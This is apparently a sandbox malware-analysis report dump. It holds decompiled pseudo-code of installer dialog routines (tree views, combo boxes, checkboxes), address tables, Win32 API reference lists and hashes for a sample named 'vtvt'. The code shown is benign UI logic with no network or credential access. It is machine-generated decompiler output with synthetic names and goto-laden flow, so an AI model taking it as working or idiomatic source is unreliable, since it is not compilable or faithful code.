                                                                                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                                    									}
                                                                                    									_t238 = _v16;
                                                                                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                                    										_t301 = _v24;
                                                                                    										_t239 =  *(_t238 + 0x5c);
                                                                                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                                    										} else {
                                                                                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    								goto L48;
                                                                                    							}
                                                                                    							if(_a8 == 0x413) {
                                                                                    								L33:
                                                                                    								_t301 = 0 | _a8 != 0x00000413;
                                                                                    								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                                    								_t295 = _t245;
                                                                                    								if(_t295 >= 0) {
                                                                                    									_t94 = _v24 + 8; // 0x8
                                                                                    									_t301 = _t245 * 0x818 + _t94;
                                                                                    									_t247 =  *_t301;
                                                                                    									if((_t247 & 0x00000010) == 0) {
                                                                                    										if((_t247 & 0x00000040) == 0) {
                                                                                    											_t248 = _t247 ^ 0x00000001;
                                                                                    										} else {
                                                                                    											_t254 = _t247 ^ 0x00000080;
                                                                                    											if(_t254 >= 0) {
                                                                                    												_t248 = _t254 & 0x000000fe;
                                                                                    											} else {
                                                                                    												_t248 = _t254 | 0x00000001;
                                                                                    											}
                                                                                    										}
                                                                                    										 *_t301 = _t248;
                                                                                    										E0040117D(_t295);
                                                                                    										_a12 = _t295 + 1;
                                                                                    										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                                    										_a8 = 0x40f;
                                                                                    									}
                                                                                    								}
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							_t301 = _a16;
                                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                    								goto L41;
                                                                                    							}
                                                                                    							goto L33;
                                                                                    						} else {
                                                                                    							goto L48;
                                                                                    						}
                                                                                    					} else {
                                                                                    						L48:
                                                                                    						if(_a8 != 0x111) {
                                                                                    							L56:
                                                                                    							if(_a8 == 0x200) {
                                                                                    								SendMessageW(_v8, 0x200, 0, 0);
                                                                                    							}
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								_t225 =  *0x42372c;
                                                                                    								if(_t225 != 0) {
                                                                                    									ImageList_Destroy(_t225);
                                                                                    								}
                                                                                    								_t226 =  *0x423740;
                                                                                    								if(_t226 != 0) {
                                                                                    									GlobalFree(_t226);
                                                                                    								}
                                                                                    								 *0x42372c = 0;
                                                                                    								 *0x423740 = 0;
                                                                                    								 *0x42a2c0 = 0;
                                                                                    							}
                                                                                    							if(_a8 != 0x40f) {
                                                                                    								L90:
                                                                                    								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                                    									ShowWindow(_v8, _t324);
                                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                                    								}
                                                                                    								goto L93;
                                                                                    							} else {
                                                                                    								E004011EF(_t301, 0, 0);
                                                                                    								_t198 = _a12;
                                                                                    								if(_t198 != 0) {
                                                                                    									if(_t198 != 0xffffffff) {
                                                                                    										_t198 = _t198 - 1;
                                                                                    									}
                                                                                    									_push(_t198);
                                                                                    									_push(8);
                                                                                    									E00404FFF();
                                                                                    								}
                                                                                    								if(_a16 == 0) {
                                                                                    									L75:
                                                                                    									E004011EF(_t301, 0, 0);
                                                                                    									_v36 =  *0x423740;
                                                                                    									_t201 =  *0x42a288;
                                                                                    									_v64 = 0xf030;
                                                                                    									_v24 = 0;
                                                                                    									if( *0x42a28c <= 0) {
                                                                                    										L86:
                                                                                    										if( *0x42a31e == 0x400) {
                                                                                    											InvalidateRect(_v8, 0, 1);
                                                                                    										}
                                                                                    										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                                    											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                                    										}
                                                                                    										goto L90;
                                                                                    									}
                                                                                    									_t292 = _t201 + 8;
                                                                                    									do {
                                                                                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                                    										if(_t207 != 0) {
                                                                                    											_t303 =  *_t292;
                                                                                    											_v72 = _t207;
                                                                                    											_v76 = 8;
                                                                                    											if((_t303 & 0x00000001) != 0) {
                                                                                    												_v76 = 9;
                                                                                    												_v60 =  &(_t292[4]);
                                                                                    												_t292[0] = _t292[0] & 0x000000fe;
                                                                                    											}
                                                                                    											if((_t303 & 0x00000040) == 0) {
                                                                                    												_t211 = (_t303 & 0x00000001) + 1;
                                                                                    												if((_t303 & 0x00000010) != 0) {
                                                                                    													_t211 = _t211 + 3;
                                                                                    												}
                                                                                    											} else {
                                                                                    												_t211 = 3;
                                                                                    											}
                                                                                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                                    										}
                                                                                    										_v24 = _v24 + 1;
                                                                                    										_t292 =  &(_t292[0x206]);
                                                                                    									} while (_v24 <  *0x42a28c);
                                                                                    									goto L86;
                                                                                    								} else {
                                                                                    									_t293 = E004012E2( *0x423740);
                                                                                    									E00401299(_t293);
                                                                                    									_t222 = 0;
                                                                                    									_t301 = 0;
                                                                                    									if(_t293 <= 0) {
                                                                                    										L74:
                                                                                    										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                                    										_a16 = _t293;
                                                                                    										_a8 = 0x420;
                                                                                    										goto L75;
                                                                                    									} else {
                                                                                    										goto L71;
                                                                                    									}
                                                                                    									do {
                                                                                    										L71:
                                                                                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                                    											_t301 = _t301 + 1;
                                                                                    										}
                                                                                    										_t222 = _t222 + 1;
                                                                                    									} while (_t222 < _t293);
                                                                                    									goto L74;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                    							goto L93;
                                                                                    						} else {
                                                                                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                                    							if(_t232 == 0xffffffff) {
                                                                                    								goto L93;
                                                                                    							}
                                                                                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                                    								_t294 = 0x20;
                                                                                    							}
                                                                                    							E00401299(_t294);
                                                                                    							SendMessageW(_a4, 0x420, 0, _t294);
                                                                                    							_a12 = _a12 | 0xffffffff;
                                                                                    							_a16 = 0;
                                                                                    							_a8 = 0x40f;
                                                                                    							goto L56;
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_v36 = 0;
                                                                                    					_v20 = 2;
                                                                                    					 *0x42a2c0 = _t291;
                                                                                    					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                                    					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                                    					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                                    					_t297 = _t258;
                                                                                    					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                    					 *0x42372c = _t260;
                                                                                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                                    					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                    					}
                                                                                    					DeleteObject(_t297);
                                                                                    					_t298 = 0;
                                                                                    					do {
                                                                                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                                    							if(_t298 != 0x20) {
                                                                                    								_v20 = 0;
                                                                                    							}
                                                                                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                                    						}
                                                                                    						_t298 = _t298 + 1;
                                                                                    					} while (_t298 < 0x21);
                                                                                    					_t299 = _a16;
                                                                                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                                    					_push(0x15);
                                                                                    					E004045C4(_a4);
                                                                                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                                    					_push(0x16);
                                                                                    					E004045C4(_a4);
                                                                                    					_t300 = 0;
                                                                                    					_v16 = 0;
                                                                                    					if( *0x42a28c <= 0) {
                                                                                    						L19:
                                                                                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						_t319 = _v24 + 8;
                                                                                    						_v32 = _t319;
                                                                                    						do {
                                                                                    							_t278 =  &(_t319[0x10]);
                                                                                    							if( *_t278 != 0) {
                                                                                    								_v64 = _t278;
                                                                                    								_t279 =  *_t319;
                                                                                    								_v88 = _v16;
                                                                                    								_t311 = 0x20;
                                                                                    								_v84 = 0xffff0002;
                                                                                    								_v80 = 0xd;
                                                                                    								_v68 = _t311;
                                                                                    								_v44 = _t300;
                                                                                    								_v72 = _t279 & _t311;
                                                                                    								if((_t279 & 0x00000002) == 0) {
                                                                                    									if((_t279 & 0x00000004) == 0) {
                                                                                    										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                    									} else {
                                                                                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                                    									}
                                                                                    								} else {
                                                                                    									_v80 = 0x4d;
                                                                                    									_v48 = 1;
                                                                                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                                    									_v36 = 1;
                                                                                    									 *( *0x423740 + _t300 * 4) = _t284;
                                                                                    									_v16 =  *( *0x423740 + _t300 * 4);
                                                                                    								}
                                                                                    							}
                                                                                    							_t300 = _t300 + 1;
                                                                                    							_t319 =  &(_v32[0x818]);
                                                                                    							_v32 = _t319;
                                                                                    						} while (_t300 <  *0x42a28c);
                                                                                    						if(_v36 != 0) {
                                                                                    							L20:
                                                                                    							if(_v20 != 0) {
                                                                                    								E004045F9(_v8);
                                                                                    								goto L23;
                                                                                    							} else {
                                                                                    								ShowWindow(_v12, 5);
                                                                                    								E004045F9(_v12);
                                                                                    								L93:
                                                                                    								return E0040462B(_a8, _a12, _a16);
                                                                                    							}
                                                                                    						}
                                                                                    						goto L19;
                                                                                    					}
                                                                                    				}
                                                                                    			}


























































                                                                                    0x00405038
                                                                                    0x00405051
                                                                                    0x00405056
                                                                                    0x0040505e
                                                                                    0x00405064
                                                                                    0x0040507a
                                                                                    0x0040507d
                                                                                    0x004052a8
                                                                                    0x004052af
                                                                                    0x004052c3
                                                                                    0x004052b1
                                                                                    0x004052b3
                                                                                    0x004052b6
                                                                                    0x004052b7
                                                                                    0x004052be
                                                                                    0x004052be
                                                                                    0x004052cf
                                                                                    0x004052dd
                                                                                    0x004052e0
                                                                                    0x004052f6
                                                                                    0x0040536b
                                                                                    0x0040536e
                                                                                    0x00405370
                                                                                    0x0040537a
                                                                                    0x00405388
                                                                                    0x00405388
                                                                                    0x0040538a
                                                                                    0x00405394
                                                                                    0x0040539a
                                                                                    0x0040539d
                                                                                    0x004053a0
                                                                                    0x004053bb
                                                                                    0x004053a2
                                                                                    0x004053ac
                                                                                    0x004053ac
                                                                                    0x004053a0
                                                                                    0x00405394
                                                                                    0x00000000
                                                                                    0x0040536e
                                                                                    0x004052fb
                                                                                    0x00405306
                                                                                    0x0040530b
                                                                                    0x00405312
                                                                                    0x00405317
                                                                                    0x0040531b
                                                                                    0x00405326
                                                                                    0x00405326
                                                                                    0x0040532a
                                                                                    0x0040532e
                                                                                    0x00405332
                                                                                    0x00405345
                                                                                    0x00405334
                                                                                    0x00405334
                                                                                    0x0040533b
                                                                                    0x00405341
                                                                                    0x0040533d
                                                                                    0x0040533d
                                                                                    0x0040533d
                                                                                    0x0040533b
                                                                                    0x00405349
                                                                                    0x0040534b
                                                                                    0x0040535e
                                                                                    0x00405361
                                                                                    0x00405364
                                                                                    0x00405364
                                                                                    0x0040532e
                                                                                    0x00000000
                                                                                    0x0040531b
                                                                                    0x004052fd
                                                                                    0x00405304
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004053be
                                                                                    0x004053be
                                                                                    0x004053c5
                                                                                    0x00405436
                                                                                    0x0040543e
                                                                                    0x00405446
                                                                                    0x00405446
                                                                                    0x0040544f
                                                                                    0x00405451
                                                                                    0x00405458
                                                                                    0x0040545b
                                                                                    0x0040545b
                                                                                    0x00405461
                                                                                    0x00405468
                                                                                    0x0040546b
                                                                                    0x0040546b
                                                                                    0x00405471
                                                                                    0x00405477
                                                                                    0x0040547d
                                                                                    0x0040547d
                                                                                    0x0040548a
                                                                                    0x004055eb
                                                                                    0x004055f2
                                                                                    0x0040560f
                                                                                    0x00405615
                                                                                    0x00405627
                                                                                    0x00405627
                                                                                    0x00000000
                                                                                    0x00405490
                                                                                    0x00405492
                                                                                    0x00405497
                                                                                    0x0040549c
                                                                                    0x004054a1
                                                                                    0x004054a3
                                                                                    0x004054a3
                                                                                    0x004054a4
                                                                                    0x004054a5
                                                                                    0x004054a7
                                                                                    0x004054a7
                                                                                    0x004054af
                                                                                    0x004054f0
                                                                                    0x004054f2
                                                                                    0x00405502
                                                                                    0x00405505
                                                                                    0x0040550a
                                                                                    0x00405511
                                                                                    0x00405514
                                                                                    0x004055b6
                                                                                    0x004055bf
                                                                                    0x004055c7
                                                                                    0x004055c7
                                                                                    0x004055d5
                                                                                    0x004055e6
                                                                                    0x004055e6
                                                                                    0x00000000
                                                                                    0x004055d5
                                                                                    0x0040551a
                                                                                    0x0040551d
                                                                                    0x00405523
                                                                                    0x00405528
                                                                                    0x0040552a
                                                                                    0x0040552c
                                                                                    0x00405532
                                                                                    0x00405539
                                                                                    0x0040553e
                                                                                    0x00405545
                                                                                    0x00405548
                                                                                    0x00405548
                                                                                    0x0040554f
                                                                                    0x0040555b
                                                                                    0x0040555f
                                                                                    0x00405561
                                                                                    0x00405561
                                                                                    0x00405551
                                                                                    0x00405553
                                                                                    0x00405553
                                                                                    0x00405581
                                                                                    0x0040558d
                                                                                    0x0040559c
                                                                                    0x0040559c
                                                                                    0x0040559e
                                                                                    0x004055a1
                                                                                    0x004055aa
                                                                                    0x00000000
                                                                                    0x004054b1
                                                                                    0x004054bc
                                                                                    0x004054bf
                                                                                    0x004054c4
                                                                                    0x004054c6
                                                                                    0x004054ca
                                                                                    0x004054da
                                                                                    0x004054e4
                                                                                    0x004054e6
                                                                                    0x004054e9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004054cc
                                                                                    0x004054cc
                                                                                    0x004054d2
                                                                                    0x004054d4
                                                                                    0x004054d4
                                                                                    0x004054d5
                                                                                    0x004054d6
                                                                                    0x00000000
                                                                                    0x004054cc
                                                                                    0x004054af
                                                                                    0x0040548a
                                                                                    0x004053cd
                                                                                    0x00000000
                                                                                    0x004053e3
                                                                                    0x004053ed
                                                                                    0x004053f2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405404
                                                                                    0x00405409
                                                                                    0x00405415
                                                                                    0x00405415
                                                                                    0x00405417
                                                                                    0x00405426
                                                                                    0x00405428
                                                                                    0x0040542c
                                                                                    0x0040542f
                                                                                    0x00000000
                                                                                    0x0040542f
                                                                                    0x004053cd
                                                                                    0x00405083
                                                                                    0x00405088
                                                                                    0x00405091
                                                                                    0x00405098
                                                                                    0x004050aa
                                                                                    0x004050b5
                                                                                    0x004050bb
                                                                                    0x004050c9
                                                                                    0x004050dd
                                                                                    0x004050e2
                                                                                    0x004050ef
                                                                                    0x004050f4
                                                                                    0x0040510a
                                                                                    0x0040511b
                                                                                    0x00405128
                                                                                    0x00405128
                                                                                    0x0040512b
                                                                                    0x00405131
                                                                                    0x00405133
                                                                                    0x00405136
                                                                                    0x0040513b
                                                                                    0x00405140
                                                                                    0x00405142
                                                                                    0x00405142
                                                                                    0x00405162
                                                                                    0x00405162
                                                                                    0x00405164
                                                                                    0x00405165
                                                                                    0x0040516a
                                                                                    0x00405170
                                                                                    0x00405174
                                                                                    0x00405179
                                                                                    0x00405181
                                                                                    0x00405185
                                                                                    0x0040518a
                                                                                    0x0040518f
                                                                                    0x00405197
                                                                                    0x0040519a
                                                                                    0x0040526a
                                                                                    0x0040527d
                                                                                    0x00000000
                                                                                    0x004051a0
                                                                                    0x004051a3
                                                                                    0x004051a6
                                                                                    0x004051a9
                                                                                    0x004051a9
                                                                                    0x004051af
                                                                                    0x004051b8
                                                                                    0x004051bb
                                                                                    0x004051bf
                                                                                    0x004051c2
                                                                                    0x004051c5
                                                                                    0x004051ce
                                                                                    0x004051d7
                                                                                    0x004051da
                                                                                    0x004051dd
                                                                                    0x004051e0
                                                                                    0x0040521e
                                                                                    0x00405249
                                                                                    0x00405220
                                                                                    0x0040522f
                                                                                    0x0040522f
                                                                                    0x004051e2
                                                                                    0x004051e5
                                                                                    0x004051f3
                                                                                    0x004051fd
                                                                                    0x00405205
                                                                                    0x0040520c
                                                                                    0x00405217
                                                                                    0x00405217
                                                                                    0x004051e0
                                                                                    0x0040524f
                                                                                    0x00405250
                                                                                    0x0040525c
                                                                                    0x0040525c
                                                                                    0x00405268
                                                                                    0x00405283
                                                                                    0x00405286
                                                                                    0x004052a3
                                                                                    0x00000000
                                                                                    0x00405288
                                                                                    0x0040528d
                                                                                    0x00405296
                                                                                    0x00405629
                                                                                    0x0040563b
                                                                                    0x0040563b
                                                                                    0x00405286
                                                                                    0x00000000
                                                                                    0x00405268
                                                                                    0x0040519a

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00405049
                                                                                    • GetDlgItem.USER32 ref: 00405054
                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                    • LoadImageW.USER32 ref: 004050B5
                                                                                    • SetWindowLongW.USER32 ref: 004050CE
                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                    • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                      • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                    • SetWindowLongW.USER32 ref: 0040527D
                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                    • GlobalFree.KERNEL32 ref: 0040546B
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                    • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                    • GetDlgItem.USER32 ref: 00405620
                                                                                    • ShowWindow.USER32(00000000), ref: 00405627
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                    • String ID: $M$N
                                                                                    • API String ID: 2564846305-813528018
                                                                                    • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                    • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                    • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                                                    • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                    				intOrPtr _v8;
                                                                                    				int _v12;
                                                                                    				void* _v16;
                                                                                    				struct HWND__* _t56;
                                                                                    				signed int _t75;
                                                                                    				signed short* _t76;
                                                                                    				signed short* _t78;
                                                                                    				long _t92;
                                                                                    				int _t103;
                                                                                    				signed int _t110;
                                                                                    				intOrPtr _t113;
                                                                                    				WCHAR* _t114;
                                                                                    				signed int* _t116;
                                                                                    				WCHAR* _t117;
                                                                                    				struct HWND__* _t118;
                                                                                    
                                                                                    				if(_a8 != 0x110) {
                                                                                    					if(_a8 != 0x111) {
                                                                                    						L13:
                                                                                    						if(_a8 != 0x4e) {
                                                                                    							if(_a8 == 0x40b) {
                                                                                    								 *0x421714 =  *0x421714 + 1;
                                                                                    							}
                                                                                    							L27:
                                                                                    							_t114 = _a16;
                                                                                    							L28:
                                                                                    							return E0040462B(_a8, _a12, _t114);
                                                                                    						}
                                                                                    						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                    						_t114 = _a16;
                                                                                    						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                    							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                    							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                    							_v12 = _t103;
                                                                                    							_v16 = _t113;
                                                                                    							_v8 = 0x428200;
                                                                                    							if(_t103 - _t113 < 0x800) {
                                                                                    								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                    								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                    								_push(1);
                                                                                    								E00404A32(_a4, _v8);
                                                                                    								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                    								_t114 = _a16;
                                                                                    							}
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                    							goto L28;
                                                                                    						} else {
                                                                                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                    								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                    							}
                                                                                    							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                    								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                    							}
                                                                                    							return 1;
                                                                                    						}
                                                                                    					}
                                                                                    					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                    						goto L27;
                                                                                    					} else {
                                                                                    						_t116 =  *0x422720 + 0x14;
                                                                                    						if(( *_t116 & 0x00000020) == 0) {
                                                                                    							goto L27;
                                                                                    						}
                                                                                    						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                    						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                    						E00404A0E();
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				_t117 = _a16;
                                                                                    				_t75 =  *(_t117 + 0x30);
                                                                                    				if(_t75 < 0) {
                                                                                    					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                    				}
                                                                                    				_t76 =  *0x42a298 + _t75 * 2;
                                                                                    				_t110 =  *_t76 & 0x0000ffff;
                                                                                    				_a8 = _t110;
                                                                                    				_t78 =  &(_t76[1]);
                                                                                    				_a16 = _t78;
                                                                                    				_v16 = _t78;
                                                                                    				_v12 = 0;
                                                                                    				_v8 = E00404734;
                                                                                    				if(_t110 != 2) {
                                                                                    					_v8 = E004046FA;
                                                                                    				}
                                                                                    				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                    				_push(0x22);
                                                                                    				E004045C4(_a4);
                                                                                    				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                    				_push(0x23);
                                                                                    				E004045C4(_a4);
                                                                                    				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                    				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                    				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                    				E004045F9(_t118);
                                                                                    				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                    				_t92 =  *( *0x42a270 + 0x68);
                                                                                    				if(_t92 < 0) {
                                                                                    					_t92 = GetSysColor( ~_t92);
                                                                                    				}
                                                                                    				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                    				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                    				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                    				 *0x421714 = 0;
                                                                                    				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                    				 *0x421714 = 0;
                                                                                    				return 0;
                                                                                    			}


















                                                                                    0x00404795
                                                                                    0x004048c2
                                                                                    0x0040491f
                                                                                    0x00404923
                                                                                    0x004049f0
                                                                                    0x004049f2
                                                                                    0x004049f2
                                                                                    0x004049f8
                                                                                    0x004049f8
                                                                                    0x004049fb
                                                                                    0x00000000
                                                                                    0x00404a02
                                                                                    0x00404931
                                                                                    0x00404937
                                                                                    0x00404941
                                                                                    0x0040494c
                                                                                    0x0040494f
                                                                                    0x00404952
                                                                                    0x0040495d
                                                                                    0x00404960
                                                                                    0x00404967
                                                                                    0x00404974
                                                                                    0x00404985
                                                                                    0x0040498b
                                                                                    0x00404993
                                                                                    0x004049a1
                                                                                    0x004049a7
                                                                                    0x004049a7
                                                                                    0x00404967
                                                                                    0x004049b1
                                                                                    0x00000000
                                                                                    0x004049bc
                                                                                    0x004049c0
                                                                                    0x004049d0
                                                                                    0x004049d0
                                                                                    0x004049d6
                                                                                    0x004049e2
                                                                                    0x004049e2
                                                                                    0x00000000
                                                                                    0x004049e6
                                                                                    0x004049b1
                                                                                    0x004048cd
                                                                                    0x00000000
                                                                                    0x004048df
                                                                                    0x004048e4
                                                                                    0x004048ea
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404913
                                                                                    0x00404915
                                                                                    0x0040491a
                                                                                    0x00000000
                                                                                    0x0040491a
                                                                                    0x004048cd
                                                                                    0x0040479b
                                                                                    0x0040479e
                                                                                    0x004047a3
                                                                                    0x004047b4
                                                                                    0x004047b4
                                                                                    0x004047bc
                                                                                    0x004047bf
                                                                                    0x004047c3
                                                                                    0x004047c6
                                                                                    0x004047ca
                                                                                    0x004047cd
